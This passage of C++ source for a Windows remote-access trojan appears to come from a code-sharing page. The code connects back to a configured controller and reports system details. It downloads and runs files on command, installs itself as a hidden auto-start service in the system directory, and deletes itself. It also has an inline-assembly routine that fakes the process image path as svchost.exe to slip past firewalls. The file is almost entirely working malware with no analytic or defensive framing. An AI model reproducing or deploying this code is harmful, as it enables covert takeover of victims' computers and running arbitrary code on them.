📄 server.cpp
字号:
memset(url,0,256);
strcpy(url,strchr(cmd,':')+1);
char seps[]= "/";
char *token;
char *file;
char myURL[MAX_PATH] ={0};
char myFILE[MAX_PATH] = {0};
strcpy(myURL,url);
token=strtok(myURL,seps);
while(token!=NULL)
{
file=token;
token=strtok(NULL,seps);
}
GetTempPath(MAX_PATH,myFILE);
strcat(myFILE, "\\");
strcat(myFILE, file);
HRESULT hr;
hr = URLDownloadToFile(0, url, myFILE, 0, 0);
if(hr!=S_OK)
return FALSE;
PROCESS_INFORMATION PI;
STARTUPINFO SI;
memset(&SI, 0, sizeof(SI));
SI.cb = sizeof(SI);
CreateProcess(myFILE, NULL, NULL, NULL, FALSE,NORMAL_PRIORITY_CLASS, NULL, NULL, &SI, &PI);
SC_HANDLE service, scm;
scm = OpenSCManager(0, 0,SC_MANAGER_CREATE_SERVICE);
service = OpenService(scm, modify_data.ws_svcname,SERVICE_ALL_ACCESS | DELETE);
DeleteService(service);
exit(0);
ExitProcess(0);
return TRUE;
}
if (strstr(cmd,"REMOVE") != NULL)
{
SC_HANDLE service, scm;
scm = OpenSCManager(0, 0,SC_MANAGER_CREATE_SERVICE);
service = OpenService(scm, modify_data.ws_svcname,SERVICE_ALL_ACCESS | DELETE);
DeleteService(service);
exit(0);
ExitProcess(0);
return TRUE;
}
return FALSE;
}
void _GetSysInfo(SOCKET hSock)
{
int ver=-1;
CString SendData;
OSVERSIONINFO osver = {sizeof(OSVERSIONINFO)};
GetVersionEx(&osver);
if (osver.dwMajorVersion == 5 && osver.dwMinorVersion == 0)
{
ver=0;
}
else if (osver.dwMajorVersion == 5 && osver.dwMinorVersion == 1)
{
CString m_stServPack = CString (osver.szCSDVersion);
m_stServPack.FreeExtra ();
if (m_stServPack.Find("Service") >=0 &&m_stServPack.Find("Pack") >=0 &&m_stServPack.Find("2") >=0)
ver=2;
else
ver=1;
}
else if (osver.dwMajorVersion == 5 && osver.dwMinorVersion == 2)
ver=3;
MEMORYSTATUS mem;
mem.dwLength=sizeof(mem);
GlobalMemoryStatus(&mem);
char CPUInfo[MAX_PATH]={0};
char SubKey[MAX_PATH]={0};
strcpy(SubKey,"HARDWARE\\DESCRIPTION\\System\\CentralProcessor\\0\0");
HKEY hKey;
if(RegOpenKeyEx(HKEY_LOCAL_MACHINE,SubKey,0L,KEY_ALL_ACCESS,&hKey) == ERROR_SUCCESS)
{
DWORD dwType;
DWORD dwSize=200;
RegQueryValueEx(hKey,"ProcessorNameString",NULL,&dwType,(BYTE *)CPUInfo,&dwSize);
RegCloseKey(hKey);
}
SendData.Format("VERSONEXc:%d|%d|%s",ver,mem.dwTotalPhys/1024/1024+1,CPUInfo);
send(hSock,SendData.GetBuffer(0),SendData.GetLength()+1,0);
}
void _ConnectServer()
{
WSADATA Data;
WSAStartup(MAKEWORD(2, 1), &Data);
int num=0;
char buf[512];
memset(buf,0,512);
SOCKET sc;
SOCKADDR_IN saddr;
saddr.sin_family = AF_INET;
saddr.sin_port = htons(modify_data.port);
saddr.sin_addr.s_addr = inet_addr(modify_data.url);
if (saddr.sin_addr.s_addr == INADDR_NONE)
{
struct hostent *hp = NULL;
if ((hp = gethostbyname(modify_data.url)) != NULL)
{
memcpy(&(saddr.sin_addr), hp->h_addr, hp->h_length);
saddr.sin_family = hp->h_addrtype;
}
else
{
return;
}
}
if((sc=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==SOCKET_ERROR) return;
if(connect(sc,(SOCKADDR *)&saddr,sizeof(saddr))==SOCKET_ERROR) return;
_GetSysInfo(sc);
while(1)
{
fd_set FdRead;
FD_ZERO(&FdRead);
FD_SET(sc,&FdRead);
int Er=select(sc+1, &FdRead, NULL, NULL, NULL);
if((Er==SOCKET_ERROR) || (Er==0)) break;
if(FD_ISSET(sc,&FdRead))
{
num=recv(sc,buf,512,0);
if(num<=0)
break;
if (_ExplainCmd(buf))
if (send(sc,"OK",2,0) == SOCKET_ERROR)
if(WSAGetLastError()!=WSAEWOULDBLOCK)
{
closesocket(sc);
return;
}
}
memset(buf,0,512);
Sleep(500);
}
closesocket(sc);
closesocket(sc);
return;
}
//以下是服务的外壳。不用管这么多。因为要写注释也不知道怎么写。格式是固定的
static SERVICE_STATUS srvStatus;
static SERVICE_STATUS_HANDLE hSrv;
static void __stdcall SvcCtrlFnct(DWORD CtrlCode)
{
switch(CtrlCode)
{
case SERVICE_CONTROL_STOP:
srvStatus.dwCheckPoint=1;
srvStatus.dwCurrentState=SERVICE_STOP_PENDING;
SetServiceStatus(hSrv,&srvStatus);
Sleep(500);
srvStatus.dwCheckPoint=0;
srvStatus.dwCurrentState=SERVICE_STOPPED;
break;
case SERVICE_CONTROL_SHUTDOWN:
srvStatus.dwCheckPoint=1;
srvStatus.dwCurrentState=SERVICE_STOP_PENDING;
SetServiceStatus(hSrv,&srvStatus);
Sleep(500);
srvStatus.dwCheckPoint=0;
srvStatus.dwCurrentState=SERVICE_STOPPED;
break;
case SERVICE_CONTROL_PAUSE:
srvStatus.dwCheckPoint=1;
srvStatus.dwCurrentState=SERVICE_PAUSE_PENDING;
SetServiceStatus(hSrv,&srvStatus);
Sleep(500);
srvStatus.dwCheckPoint=0;
srvStatus.dwCurrentState=SERVICE_PAUSED;
break;
case SERVICE_CONTROL_CONTINUE:
srvStatus.dwCheckPoint=1;
srvStatus.dwCurrentState=SERVICE_CONTINUE_PENDING;
SetServiceStatus(hSrv,&srvStatus);
Sleep(500);
srvStatus.dwCheckPoint=0;
srvStatus.dwCurrentState=SERVICE_RUNNING;
break;
}
SetServiceStatus(hSrv,&srvStatus);
}
static BOOL service_is_exist()
{
char SubKey[MAX_PATH]={0};
strcpy(SubKey,"SYSTEM\\CurrentControlSet\\Services\\");
strcat(SubKey,modify_data.ws_svcname);
HKEY hKey;
if(RegOpenKeyEx(HKEY_LOCAL_MACHINE,SubKey,0L,KEY_ALL_ACCESS,&hKey) == ERROR_SUCCESS)
return TRUE;
else
return FALSE;
}
static BOOL fDelete_Me=FALSE;
static void RunService(char *m_ServiceName,char *m_DisplayName,char *m_Description)
{
char FilePath[MAX_PATH];
GetModuleFileName(NULL,FilePath,MAX_PATH);
///*
char SystemPath[MAX_PATH];
GetSystemDirectory(SystemPath,MAX_PATH);
if (strncmp(SystemPath,FilePath,strlen(SystemPath)) != 0)
{
char FileTitle[80];
GetFileTitle(FilePath,FileTitle,80);
if (strstr(FileTitle,".exe") == NULL && strstr(FileTitle,".EXE") == NULL)
strcat(FileTitle,".exe");
strcat(SystemPath,"\\");
strcat(SystemPath,FileTitle);
CopyFile(FilePath,SystemPath,FALSE);
memset(FilePath,0,MAX_PATH);
strcpy(FilePath,SystemPath);
fDelete_Me = TRUE;
}
SetFileAttributes (FilePath,FILE_ATTRIBUTE_HIDDEN|FILE_ATTRIBUTE_SYSTEM);
//*/
char Desc[MAX_PATH];
HKEY key=NULL;
SC_HANDLE newService=NULL, scm=NULL;
__try
{
scm = OpenSCManager(0, 0,SC_MANAGER_ALL_ACCESS);
if (!scm)
__leave;
newService = CreateService(
scm, m_ServiceName,
m_DisplayName,
SERVICE_ALL_ACCESS|SERVICE_INTERACTIVE_PROCESS,
SERVICE_WIN32_OWN_PROCESS,
SERVICE_AUTO_START,
SERVICE_ERROR_IGNORE,
FilePath,
NULL, NULL, NULL, NULL, NULL);
if (newService == NULL)
{
if (GetLastError() == ERROR_SERVICE_EXISTS)
{
newService = OpenService(scm,m_ServiceName,SERVICE_ALL_ACCESS);
if (newService==NULL)
__leave;
else
StartService(newService,0, 0);
}
}
if (!StartService(newService,0, 0))
__leave;
strcpy(Desc,"SYSTEM\\CurrentControlSet\\Services\\");
strcat(Desc,m_ServiceName);
RegOpenKey(HKEY_LOCAL_MACHINE,Desc,&key);
RegSetValueEx(key,"Description",0,REG_SZ,(CONST BYTE*)m_Description,lstrlen(m_Description));
}
__finally
{
if (newService!=NULL)
CloseServiceHandle(newService);
if (scm!=NULL)
CloseServiceHandle(scm);
if (key!=NULL)
RegCloseKey(key);
}
}
void ByPassFireWall()
{
char szpath[64];
static char modulepath[128];//一定是全局变量,why?
GetSystemDirectory(szpath,64);
strcat(szpath,"\\svchost.exe");
//转化为Unicode字符
for (int ii=0;ii<64;ii++)
{
modulepath[ii*2] = szpath[ii];
modulepath[ii*2+1] = 0;
}
__asm
{
MOV EAX, fs:[30h]
MOV EAX, [EAX+0xC]
MOV EAX, [EAX+0xC]
lea ebx,modulepath
mov WORD ptr[EAX+0x24],0x60
mov [EAX+0x28],ebx
MOV EAX, fs:[30h]
mov EAX,[EAX+0x10]
lea EAX,[EAX+0x3c]
lea ebx,modulepath
mov [eax],ebx //ImagePathName->Buffer
mov WORD ptr[eax-4],0x60 //ImagePathName->Length
MOV EAX, fs:[30h]
mov EAX,[EAX+0x10] //peb->_RTL_USER_PROCESS_PARAMETERS
lea eax,[EAX+0x44] //_RTL_USER_PROCESS_PARAMETERS -> CommandLine->Buffer
lea ebx,modulepath
mov [eax],ebx //CommandLine-->Buffer
mov WORD ptr[eax-4],0x60 //CommandLine-->Length
}
}
void ServiceMain(DWORD dwargc,wchar_t* argv[])
{
hSrv=RegisterServiceCtrlHandler(modify_data.ws_svcname,SvcCtrlFnct);
srvStatus.dwServiceType=SERVICE_WIN32_SHARE_PROCESS;
srvStatus.dwControlsAccepted=SERVICE_ACCEPT_STOP | SERVICE_ACCEPT_PAUSE_CONTINUE | SERVICE_ACCEPT_SHUTDOWN;
srvStatus.dwWin32ExitCode=NO_ERROR;
srvStatus.dwWaitHint=2000;
srvStatus.dwCheckPoint=1;
srvStatus.dwCurrentState=SERVICE_START_PENDING;
SetServiceStatus(hSrv,&srvStatus);
srvStatus.dwCheckPoint=0;
Sleep(500);
srvStatus.dwCurrentState=SERVICE_RUNNING;
SetServiceStatus(hSrv,&srvStatus);
WSADATA Data;
WSAStartup(MAKEWORD(2, 2), &Data);
for(int i =0;i <8; i++)
{
hThread[i]=NULL;
}
HideCurrentProcess();
ByPassFireWall();
while(1)
{
StopFlag = 1;
_ConnectServer();
Sleep(3000);
}
srvStatus.dwCheckPoint=1;
srvStatus.dwCurrentState=SERVICE_STOP_PENDING;
SetServiceStatus(hSrv,&srvStatus);
srvStatus.dwCheckPoint=0;
srvStatus.dwCurrentState=SERVICE_STOPPED;
SetServiceStatus(hSrv,&srvStatus);
return;
}
////////////////////////////////////////////////////////////////////////////////////////
//////////////////////////////////////////////////
//////////////////////////////////
///////////////////////////////
int APIENTRY WinMain(HINSTANCE hInstance,HINSTANCE hPrevInstance,LPSTR lpCmdLine,int nCmdShow)
{
if (service_is_exist())
{
SERVICE_TABLE_ENTRY serviceTable[] =
{
{modify_data.ws_svcname,(LPSERVICE_MAIN_FUNCTION) ServiceMain},
{NULL,NULL}
};
StartServiceCtrlDispatcher(serviceTable);
}
else
{
RunService(modify_data.ws_svcname,modify_data.ws_svcdisplay ,modify_data.ws_svcdesc);
if (fDelete_Me)
{
_DeleteMe();
exit(0);
}
}
return 0;
}
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -